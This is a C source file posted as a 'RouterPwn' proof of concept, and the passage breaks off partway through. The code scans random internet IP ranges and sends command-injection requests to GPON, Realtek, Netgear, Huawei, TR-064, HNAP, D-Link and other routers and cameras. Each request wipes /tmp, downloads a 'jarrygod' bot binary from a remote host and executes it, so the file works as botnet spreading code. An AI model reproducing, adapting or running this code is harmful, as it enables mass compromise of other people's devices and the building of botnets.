SHOW:
|
|
- or go back to the newest paste.
1 | //RouterPwn Proof of Concept | |
2 | //Target 12 different router exploits | |
3 | //Don't forget to edit your payloads | |
4 | ||
5 | #include <stdlib.h> | |
6 | #include <stdarg.h> | |
7 | #include <stdio.h> | |
8 | #include <sys/socket.h> | |
9 | #include <sys/types.h> | |
10 | #include <netinet/in.h> | |
11 | #include <arpa/inet.h> | |
12 | #include <netdb.h> | |
13 | #include <signal.h> | |
14 | #include <strings.h> | |
15 | #include <string.h> | |
16 | #include <sys/utsname.h> | |
17 | #include <unistd.h> | |
18 | #include <fcntl.h> | |
19 | #include <errno.h> | |
20 | #include <netinet/udp.h> | |
21 | #include <netinet/tcp.h> | |
22 | #include <sys/wait.h> | |
23 | #include <sys/ioctl.h> | |
24 | #include <net/if.h> | |
25 | ||
26 | int GPON1_Range [] = {187,189,200,201,207}; | |
27 | int GPON2_Range [] = {1,2,5,31,37,41,42,58,62,78,82,84,88,89,91,92,95,103,113,118,145,147,178,183,185,195,210,212}; | |
28 | ||
29 | int exploit_pid, scanner2_pid, scanner3_pid, scanner4_pid, scanner5_pid, scanner6_pid, scanner7_pid, scanner8_pid, scanner9_pid, scanner10_pid, scanner11_pid, scanner12_pid, scanner13_pid, timeout = 100000; | |
30 | static uint8_t ipState[40] = {0}; | |
31 | int max = 0, i = 0; | |
32 | ||
33 | int socket_connect_tcp(char *host, in_port_t port) // tcp socket for sending POST/GET requests | |
34 | { | |
35 | struct hostent *hp; | |
36 | struct sockaddr_in addr; | |
37 | int on = 1, sock; | |
38 | struct timeval timeout; | |
39 | timeout.tv_sec = 3; // 3 sec timeout on socket | |
40 | timeout.tv_usec = 0; | |
41 | if ((hp = gethostbyname(host)) == NULL) return 0; | |
42 | bcopy(hp->h_addr, &addr.sin_addr, hp->h_length); | |
43 | addr.sin_port = htons(port); | |
44 | addr.sin_family = AF_INET; | |
45 | sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); | |
46 | setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)); | |
47 | if (sock == -1) return 0; | |
48 | if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0; | |
49 | return sock; | |
50 | } | |
51 | ||
52 | ||
53 | void exploit_socket_gpon8080(unsigned char *host) | |
54 | { | |
55 | scanner3_pid = fork(); | |
56 | ||
57 | if (scanner3_pid > 0 || scanner3_pid == -1) | |
58 | return; | |
59 | ||
60 | int gpon_socket1; | |
61 | char gpon_request1[1024]; | |
62 | ||
63 | gpon_socket1 = socket_connect_tcp((char *)host, 8080); | |
64 | ||
65 | sprintf(gpon_request1, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://0.0.0.0/jarrygod.mips+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0"); | |
66 | ||
67 | if (gpon_socket1 != 0) | |
68 | { | |
69 | write(gpon_socket1, gpon_request1, strlen(gpon_request1)); | |
70 | usleep(200000); | |
71 | close(gpon_socket1); | |
72 | printf("[Pwn] Found Exploitable Device %s [GPON] [8080]\n", host); | |
73 | } | |
74 | exit(0); | |
75 | } | |
76 | ||
77 | void exploit_socket_gpon80(unsigned char *host) | |
78 | { | |
79 | scanner4_pid = fork(); | |
80 | ||
81 | if (scanner4_pid > 0 || scanner4_pid == -1) | |
82 | return; | |
83 | ||
84 | int gpon_socket2; | |
85 | char gpon_request2[1024]; | |
86 | ||
87 | gpon_socket2 = socket_connect_tcp((char *)host, 80); | |
88 | ||
89 | sprintf(gpon_request2, "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://0.0.0.0/jarrygod.mips+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0"); | |
90 | ||
91 | if (gpon_socket2 != 0) | |
92 | { | |
93 | write(gpon_socket2, gpon_request2, strlen(gpon_request2)); | |
94 | usleep(200000); | |
95 | close(gpon_socket2); | |
96 | printf("[Pwn] Found Exploitable Device %s [GPON] [80]\n", host); | |
97 | } | |
98 | exit(0); | |
99 | } | |
100 | ||
101 | void exploit_socket_realtek(unsigned char *host) | |
102 | { | |
103 | scanner5_pid = fork(); | |
104 | ||
105 | if (scanner5_pid > 0 || scanner5_pid == -1) | |
106 | return; | |
107 | ||
108 | int realtek_socket; | |
109 | char realtek_request[1024], realtek_request2[1024]; | |
110 | ||
111 | realtek_socket = socket_connect_tcp((char *)host, 52869); | |
112 | ||
113 | sprintf(realtek_request, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://209.141.42.3/jarrygod.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host); | |
114 | sprintf(realtek_request2, "POST /picsdesc.xml HTTP/1.1\r\nHost: %s:52869\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x jarrygod.mips;./jarrygod.mips realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n", host); | |
115 | ||
116 | if (realtek_socket != 0) | |
117 | { | |
118 | write(realtek_socket, realtek_request, strlen(realtek_request)); | |
119 | sleep(5); | |
120 | write(realtek_socket, realtek_request2, strlen(realtek_request2)); | |
121 | usleep(200000); | |
122 | close(realtek_socket); | |
123 | printf("[Pwn] Found Exploitable Device %s [REALTEK] [52869]\n", host); | |
124 | } | |
125 | exit(0); | |
126 | } | |
127 | ||
128 | void exploit_socket_netgear(unsigned char *host) | |
129 | { | |
130 | scanner6_pid = fork(); | |
131 | ||
132 | if (scanner6_pid > 0 || scanner6_pid == -1) | |
133 | return; | |
134 | ||
135 | int netgear_socket, netgear_socket2; | |
136 | char netgear_request[1024]; | |
137 | ||
138 | netgear_socket = socket_connect_tcp((char *)host, 8080); | |
139 | netgear_socket2 = socket_connect_tcp((char *)host, 80); | |
140 | ||
141 | sprintf(netgear_request, "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://0.0.0.0/jarrygod.mips+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0\r\n\r\n"); | |
142 | ||
143 | if (netgear_socket != 0) | |
144 | { | |
145 | write(netgear_socket, netgear_request, strlen(netgear_request)); | |
146 | usleep(200000); | |
147 | close(netgear_socket); | |
148 | printf("[Pwn] Found Exploitable Device %s [NETGEAR] [8080]\n", host); | |
149 | } | |
150 | if (netgear_socket2 != 0) | |
151 | { | |
152 | write(netgear_socket2, netgear_request, strlen(netgear_request)); | |
153 | usleep(200000); | |
154 | close(netgear_socket2); | |
155 | printf("[Pwn] Found Exploitable Device %s [NETGEAR] [80]\n", host); | |
156 | } | |
157 | exit(0); | |
158 | } | |
159 | ||
160 | void exploit_socket_huawei(unsigned char *host) | |
161 | { | |
162 | scanner6_pid = fork(); | |
163 | ||
164 | if (scanner6_pid > 0 || scanner6_pid == -1) | |
165 | return; | |
166 | ||
167 | int huawei_socket; | |
168 | char huawei_request[1024]; | |
169 | ||
170 | huawei_socket = socket_connect_tcp((char *)host, 37215); | |
171 | ||
172 | sprintf(huawei_request, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 0.0.0.0 -l /tmp/huawei -r /jarrygod.mips;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>", host); | |
173 | ||
174 | if (huawei_socket != 0) | |
175 | { | |
176 | write(huawei_socket, huawei_request, strlen(huawei_request)); | |
177 | usleep(200000); | |
178 | close(huawei_socket); | |
179 | printf("[Pwn] Found Exploitable Device %s [HUAWEI] [37215]\n", host); | |
180 | } | |
181 | exit(0); | |
182 | } | |
183 | ||
184 | void exploit_socket_tr064(unsigned char *host) | |
185 | { | |
186 | scanner7_pid = fork(); | |
187 | ||
188 | if (scanner7_pid > 0 || scanner7_pid == -1) | |
189 | return; | |
190 | ||
191 | int tr064_socket, tr064_socket2; | |
192 | char tr064_request[1024], tr064_request2[1024]; | |
193 | ||
194 | tr064_socket = socket_connect_tcp((char *)host, 7574); | |
195 | tr064_socket2 = socket_connect_tcp((char *)host, 5555); | |
196 | ||
197 | sprintf(tr064_request, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://0.0.0.0/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"); | |
198 | sprintf(tr064_request2, "POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://0.0.0.0/tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"); | |
199 | ||
200 | if (tr064_socket != 0) | |
201 | { | |
202 | write(tr064_socket, tr064_request, strlen(tr064_request)); | |
203 | usleep(200000); | |
204 | close(tr064_socket); | |
205 | printf("[Pwn] Found Exploitable Device %s [TR-064] [7574]\n", host); | |
206 | } | |
207 | if (tr064_socket2 != 0) | |
208 | { | |
209 | write(tr064_socket2, tr064_request2, strlen(tr064_request2)); | |
210 | usleep(200000); | |
211 | close(tr064_socket2); | |
212 | printf("[Pwn] Found Exploitable Device %s [TR-064] [5555]\n", host); | |
213 | } | |
214 | exit(0); | |
215 | } | |
216 | ||
217 | void exploit_socket_hnap(unsigned char *host) | |
218 | { | |
219 | scanner8_pid = fork(); | |
220 | ||
221 | if (scanner8_pid > 0 || scanner8_pid == -1) | |
222 | return; | |
223 | ||
224 | int hnap_socket; | |
225 | char hnap_request[1024]; | |
226 | ||
227 | hnap_socket = socket_connect_tcp((char *)host, 80); | |
228 | ||
229 | sprintf(hnap_request, "POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://0.0.0.0/jarrygod.mips && chmod 777 /tmp/jarrygod.mips/ && /tmp/jarrygod.mips`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n", host); | |
230 | ||
231 | if (hnap_socket != 0) | |
232 | { | |
233 | write(hnap_socket, hnap_request, strlen(hnap_request)); | |
234 | usleep(200000); | |
235 | close(hnap_socket); | |
236 | printf("[Pwn] Found Exploitable Device %s [HNAP] [80]\n", host); | |
237 | } | |
238 | exit(0); | |
239 | } | |
240 | ||
241 | void exploit_socket_crossweb(unsigned char *host) | |
242 | { | |
243 | scanner9_pid = fork(); | |
244 | ||
245 | if (scanner9_pid > 0 || scanner9_pid == -1) | |
246 | return; | |
247 | ||
248 | int crossweb_socket; | |
249 | char crossweb_request[1024]; | |
250 | ||
251 | crossweb_socket = socket_connect_tcp((char *)host, 81); | |
252 | ||
253 | sprintf(crossweb_request, "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://0.0.0.0/jarrygod.arm7;sh${IFS}/tmp/jarrygod.arm7&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n"); | |
254 | ||
255 | if (crossweb_socket != 0) | |
256 | { | |
257 | write(crossweb_socket, crossweb_request, strlen(crossweb_request)); | |
258 | usleep(200000); | |
259 | close(crossweb_socket); | |
260 | printf("[Pwn] Found Exploitable Device %s [CROSSWEB] [81]\n", host); | |
261 | } | |
262 | exit(0); | |
263 | } | |
264 | ||
265 | void exploit_socket_jaws(unsigned char *host) | |
266 | { | |
267 | scanner10_pid = fork(); | |
268 | ||
269 | if (scanner10_pid > 0 || scanner10_pid == -1) | |
270 | return; | |
271 | ||
272 | int jaws_socket; | |
273 | char jaws_request[1024]; | |
274 | ||
275 | jaws_socket = socket_connect_tcp((char *)host, 80); | |
276 | ||
277 | sprintf(jaws_request, "GET /shell?cd+/tmp;rm+-rf+*;wget+http://0.0.0.0/jarrygod.arm7;chmod+777+jarrygod.arm7;/tmp/jarrygod.arm7+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n", host); | |
278 | ||
279 | if (jaws_socket != 0) | |
280 | { | |
281 | write(jaws_socket, jaws_request, strlen(jaws_request)); | |
282 | usleep(200000); | |
283 | close(jaws_socket); | |
284 | printf("[Pwn] Found Exploitable Device %s [JAWS] [80]\n", host); | |
285 | } | |
286 | exit(0); | |
287 | } | |
288 | ||
289 | void exploit_socket_dlink(unsigned char *host) | |
290 | { | |
291 | scanner11_pid = fork(); | |
292 | ||
293 | if (scanner11_pid > 0 || scanner11_pid == -1) | |
294 | return; | |
295 | ||
296 | int dlink_socket; | |
297 | char dlink_request[1024]; | |
298 | ||
299 | dlink_socket = socket_connect_tcp((char *)host, 49152); | |
300 | ||
301 | sprintf(dlink_request, "POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://0.0.0.0/jarrygod.mips;/tmp/jarrygod.mips dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n", host); | |
302 | ||
303 | if (dlink_socket != 0) | |
304 | { | |
305 | write(dlink_socket, dlink_request, strlen(dlink_request)); | |
306 | usleep(200000); | |
307 | close(dlink_socket); | |
308 | printf("Pwn] Found Exploitable Device %s [DLINK] [49152]\n", host); | |
309 | } | |
310 | exit(0); | |
311 | } | |
312 | ||
313 | void exploit_socket_r7064(unsigned char *host) | |
314 | { | |
315 | scanner12_pid = fork(); | |
316 | ||
317 | if (scanner12_pid > 0 || scanner12_pid == -1) | |
318 | return; | |
319 | ||
320 | int r7064_socket; | |
321 | char r7064_request[1024]; | |
322 | ||
323 | r7064_socket = socket_connect_tcp((char *)host, 8443); | |
324 | ||
325 | sprintf(r7064_request, "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://0.0.0.0/jarrygod.mips;${IFS}sh${IFS}/var/tmp/jarrygod.mips"); | |
326 | ||
327 | if (r7064_socket != 0) | |
328 | { | |
329 | write(r7064_socket, r7064_request, strlen(r7064_request)); | |
330 | usleep(200000); | |
331 | close(r7064_socket); | |
332 | printf("[Pwn] Found Exploitable Device %s [R7064] [8443]\n", host); | |
333 | } | |
334 | exit(0); | |
335 | } | |
336 | ||
337 | void exploit_socket_vacron(unsigned char *host) | |
338 | { | |
339 | scanner13_pid = fork(); | |
340 | ||
341 | if (scanner13_pid > 0 || scanner13_pid == -1) | |
342 | return; | |
343 | ||
344 | int vacron_socket; | |
345 | char vacron_request[1024]; | |
346 | ||
347 | vacron_socket = socket_connect_tcp((char *)host, 8080); | |
348 | ||
349 | sprintf(vacron_request, "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://0.0.0.0/jarrygod.arm7;chmod+777+jarrygod.arm7;/tmp/jarrygod.arm7+varcron"); | |
350 | ||
351 | if (vacron_socket != 0) | |
352 | { | |
353 | write(vacron_socket, vacron_request, strlen(vacron_request)); | |
354 | usleep(200000); | |
355 | close(vacron_socket); | |
356 | printf("Pwn] Found Exploitable Device %s [VACRON] [8080]\n", host); | |
357 | } | |
358 | exit(0); | |
359 | } | |
360 | void GPON8080_IPGen() | |
361 | { | |
362 | char gpon_ip1[16] = {0};char gpon_ip2[16] = {0};char gpon_ip3[16] = {0}; | |
363 | char gpon_ip4[16] = {0};char gpon_ip5[16] = {0};char gpon_ip6[16] = {0}; | |
364 | ||
365 | srand(time(NULL)); | |
366 | int gpon_range1 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range2 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range3 = rand() % (sizeof(GPON1_Range)/sizeof(char *)); | |
367 | int gpon_range4 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range5 = rand() % (sizeof(GPON1_Range)/sizeof(char *));int gpon_range6 = rand() % (sizeof(GPON1_Range)/sizeof(char *)); | |
368 | ||
369 | ipState[0] = GPON1_Range[gpon_range1];ipState[4] = GPON1_Range[gpon_range2];ipState[8] = GPON1_Range[gpon_range3]; | |
370 | ipState[12] = GPON1_Range[gpon_range4];ipState[16] = GPON1_Range[gpon_range5];ipState[20] = GPON1_Range[gpon_range6]; | |
371 | ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255; | |
372 | ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255; | |
373 | ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255; | |
374 | ||
375 | sprintf(gpon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]); | |
376 | sprintf(gpon_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]); | |
377 | sprintf(gpon_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]); | |
378 | ||
379 | exploit_socket_gpon8080(gpon_ip1);exploit_socket_gpon8080(gpon_ip2);exploit_socket_gpon8080(gpon_ip3);exploit_socket_gpon8080(gpon_ip4);exploit_socket_gpon8080(gpon_ip5);exploit_socket_gpon8080(gpon_ip6); | |
380 | } | |
381 | ||
382 | void GPON80_IPGen() | |
383 | { | |
384 | char gpon2_ip1[16] = {0};char gpon2_ip2[16] = {0};char gpon2_ip3[16] = {0}; | |
385 | char gpon2_ip4[16] = {0};char gpon2_ip5[16] = {0};char gpon2_ip6[16] = {0}; | |
386 | ||
387 | srand(time(NULL)); | |
388 | int gpon2_range1 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range2 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range3 = rand() % (sizeof(GPON2_Range)/sizeof(char *)); | |
389 | int gpon2_range4 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range5 = rand() % (sizeof(GPON2_Range)/sizeof(char *));int gpon2_range6 = rand() % (sizeof(GPON2_Range)/sizeof(char *)); | |
390 | ||
391 | ipState[0] = GPON2_Range[gpon2_range1];ipState[4] = GPON2_Range[gpon2_range2];ipState[8] = GPON2_Range[gpon2_range3]; | |
392 | ipState[12] = GPON2_Range[gpon2_range4];ipState[16] = GPON2_Range[gpon2_range5];ipState[20] = GPON2_Range[gpon2_range6]; | |
393 | ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255; | |
394 | ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255; | |
395 | ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255; | |
396 | ||
397 | sprintf(gpon2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon2_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]); | |
398 | sprintf(gpon2_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon2_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]); | |
399 | sprintf(gpon2_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon2_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]); | |
400 | ||
401 | exploit_socket_gpon80(gpon2_ip1);exploit_socket_gpon80(gpon2_ip2);exploit_socket_gpon80(gpon2_ip3);exploit_socket_gpon80(gpon2_ip4);exploit_socket_gpon80(gpon2_ip5);exploit_socket_gpon80(gpon2_ip6); | |
402 | } | |
403 | ||
404 | void REALTEK_IPGen() | |
405 | { | |
406 | char realtek_ip1[16] = {0};char realtek_ip2[16] = {0};char realtek_ip3[16] = {0};char realtek_ip4[16] = {0};char realtek_ip5[16] = {0}; | |
407 | char realtek_ip6[16] = {0};char realtek_ip7[16] = {0};char realtek_ip8[16] = {0};char realtek_ip9[16] = {0};char realtek_ip10[16] = {0}; | |
408 | ||
409 | srand(time(NULL)); | |
410 | ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233; | |
411 | ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255; | |
412 | ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255; | |
413 | ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255; | |
414 | ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233; | |
415 | ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255; | |
416 | ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255; | |
417 | ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255; | |
418 | ||
419 | sprintf(realtek_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(realtek_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]); | |
420 | sprintf(realtek_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(realtek_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]); | |
421 | sprintf(realtek_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(realtek_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]); | |
422 | sprintf(realtek_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(realtek_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]); | |
423 | sprintf(realtek_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(realtek_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]); | |
424 | ||
425 | exploit_socket_realtek(realtek_ip1);exploit_socket_realtek(realtek_ip2);exploit_socket_realtek(realtek_ip3);exploit_socket_realtek(realtek_ip4);exploit_socket_realtek(realtek_ip5); | |
426 | exploit_socket_realtek(realtek_ip6);exploit_socket_realtek(realtek_ip7);exploit_socket_realtek(realtek_ip8);exploit_socket_realtek(realtek_ip9);exploit_socket_realtek(realtek_ip10); | |
427 | } | |
428 | ||
429 | void NETGEAR_IPGen() | |
430 | { | |
431 | char netgear_ip1[16] = {0};char netgear_ip2[16] = {0};char netgear_ip3[16] = {0};char netgear_ip4[16] = {0};char netgear_ip5[16] = {0}; | |
432 | char netgear_ip6[16] = {0};char netgear_ip7[16] = {0};char netgear_ip8[16] = {0};char netgear_ip9[16] = {0};char netgear_ip10[16] = {0}; | |
433 | ||
